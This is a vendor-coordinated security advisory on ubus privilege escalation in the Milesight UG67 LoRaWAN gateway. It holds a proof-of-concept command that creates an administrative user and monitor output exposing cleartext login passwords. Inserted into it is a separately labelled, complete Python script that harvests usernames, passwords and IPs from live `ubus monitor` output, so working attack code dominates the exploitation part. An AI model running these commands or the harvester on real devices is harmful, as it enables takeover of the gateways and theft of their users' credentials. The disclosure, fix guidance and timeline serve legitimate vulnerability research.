
Milesight UG67: UBUS Allows for Privilege Escalation

Attackers who can execute commands on a Milesight UG67 LoRaWAN Gateway can gain full root access by using ubus features.

Details

Introduction

The Milesight UG67 is a robust LoRaWAN® gateway designed for outdoor deployments.

More Details

Attackers who are able to execute commands with the privileges of any user account on a Milesight UG67 LoRaWAN Gateway can use the ubus inter-process communication system to read the ubus messages of other processes and to call ubus functions. This allows them, for example, to create new users with administrative privileges or to obtain the cleartext credentials of other users who authenticate to the device, including administrative accounts.

Proof of Concept

Any user account with the ability to execute arbitrary commands on the gateway (see rt-sa-2024-003 on how to gain command execution via PostgreSQL) can use the ubus command-line client to issue commands. In the following, a user named redteam is created via ubus call:

$ ubus call yruo_usermanagement add \
"{ \
    'base': 'user_list', \
    'index': 'user_listlvf0lwqg', \
    'value': { \
        'username': 'redteam', \
        'old_username': 'username', \
        'password': 'secretpassword', \
        'permission': '1' \
    }, \
    'type': 'user_list', \
    'ysusername': 'admin', \
    'ysrole': 4 \
}"

Afterwards, it is possible to log in to the web interface with almost full access. This allows reading and changing all configured values, including all secrets.

To monitor traffic received by the ubusd server, the ubus monitor command can be used:

$ ubus monitor

This includes the messages generated when a user authenticates to the system via the web interface:

-> bd896693 #00000000  status: {"status":0}
[...]
<- bd896693 #9a5c2c32  invoke: {"objid": -1705235406, "method": "login",
                                "data": {"username": "admin",
                                         "password": "xxxxxxxxxxxxxxxxxxxxxx",
                                         "ubus_rpc_session": "000000[...]00",
                                         "timeout": 1800, "ip": "127.0.0.1"}}

Since ubus passes the login details in the clear, attackers can collect the credentials of all users who authenticate to the gateway while the ubus traffic is being monitored.
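As an added example (not code from the advisory or from Milesight), the following Python script parses captured ubus monitor output in the format shown above and extracts the credentials from every login invocation. The sample capture embedded in it is constructed for this example; the parser tolerates payloads that span several indented lines and skips messages whose payload is not valid JSON.

```python
"""Harvest web-interface logins from captured `ubus monitor` output.

Added example; not part of the advisory or of the Milesight firmware. It
parses the message format shown in the advisory: each message starts with a
direction ("->" or "<-"), a client ID, a sequence number and a message type,
followed by a JSON payload that may continue over further indented lines.
"""
import json
import re

# Header of one ubus monitor message. The JSON payload after the type may be
# wrapped onto additional lines that start with whitespace.
_HEADER = re.compile(
    r"^(?P<dir>->|<-) (?P<client>[0-9a-f]{8}) #(?P<seq>[0-9a-f]{8})\s+"
    r"(?P<type>\w+): (?P<payload>.*)$"
)

# Constructed sample capture, modelled on the output shown in the advisory.
# The credentials and the second client are invented for the example.
SAMPLE_MONITOR_OUTPUT = """\
-> bd896693 #00000000  status: {"status":0}
<- bd896693 #9a5c2c32  invoke: {"objid": -1705235406, "method": "login",
                                "data": {"username": "admin",
                                         "password": "Passw0rd!",
                                         "ubus_rpc_session": "00000000000000000000000000000000",
                                         "timeout": 1800, "ip": "127.0.0.1"}}
<- 1a2b3c4d #00000001  invoke: {"objid": 12345, "method": "status", "data": {}}
<- bd896693 #9a5c2c33  invoke: {"objid": -1705235406, "method": "login",
                                "data": {"username": "operator", "password": "op-secret",
                                         "ubus_rpc_session": "00000000000000000000000000000000",
                                         "timeout": 1800, "ip": "10.0.0.5"}}
"""


def _finish(raw):
    """Decode the accumulated payload; an undecodable payload becomes None."""
    try:
        raw["payload"] = json.loads(raw["payload"])
    except json.JSONDecodeError:
        raw["payload"] = None
    return raw


def iter_messages(text):
    """Yield one dict per ubus monitor message.

    Keys: dir, client, seq, type, payload (parsed JSON or None).
    Lines starting with whitespace are continuations of the previous payload.
    """
    current = None
    for line in text.splitlines():
        match = _HEADER.match(line)
        if match:
            if current is not None:
                yield _finish(current)
            current = match.groupdict()
        elif current is not None and line[:1].isspace():
            # JSON ignores whitespace, so joining fragments with a space is safe.
            current["payload"] += " " + line.strip()
    if current is not None:
        yield _finish(current)


def harvest_logins(text):
    """Return (username, password, ip) for every login invocation in the capture."""
    creds = []
    for msg in iter_messages(text):
        if msg["type"] != "invoke" or msg["payload"] is None:
            continue
        if msg["payload"].get("method") != "login":
            continue
        data = msg["payload"].get("data", {})
        creds.append((data.get("username"), data.get("password"), data.get("ip")))
    return creds


if __name__ == "__main__":
    for username, password, ip in harvest_logins(SAMPLE_MONITOR_OUTPUT):
        print(f"{ip}: {username} / {password}")
```

On a real device the input would be the output of `ubus monitor` piped into the script; the login invocation is the same kind of message regardless of which client issued it, so every web-interface login that happens while the monitor runs is captured.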

Workaround and Fix

The ubus ACL should be modified to restrict access to ubus for low-privileged user accounts by default.

Security Risk

Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway can collect valid user credentials by monitoring ubus traffic or create new users with administrative privileges. This allows attackers to completely take over the device and extract all configured secrets.

Since all accounts except the root account only have a limited shell configured, which does not allow executing arbitrary commands, this attack requires another vulnerability (like rt-sa-2024-003) to gain shell access. In combination, these vulnerabilities pose a high risk.

Timeline

  • 2024-04-25 Vulnerability identified
  • 2024-04-29 Customer approved disclosure to vendor
  • 2024-05-14 Vendor notified
  • 2024-06-28 Asked vendor for update
  • 2024-07-03 Vendor will provide update until end of July
  • 2024-07-24 Asked vendor for update
  • 2024-07-30 Vendor stated: Work in progress
  • 2024-08-09 Vendor stated: Fix expected Q3/24
  • 2024-09-24 CVE ID requested
  • 2024-09-24 Asked vendor for update
  • 2024-09-24 Vendor stated: Fix in 60.0.0.44
  • 2024-10-04 CVE ID assigned
  • 2024-10-07 Asked vendor for update
  • 2024-10-08 Vendor stated: Fix will be available mid-October
  • 2024-10-18 Asked vendor for update
  • 2024-10-21 Vendor stated: Fix will be available mid-November
  • 2024-11-04 Vendor released fixed version for testing
  • 2024-11-05 Vendor released fixed version
  • 2024-12-10 Customer approved public release of vulnerability details
  • 2024-12-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/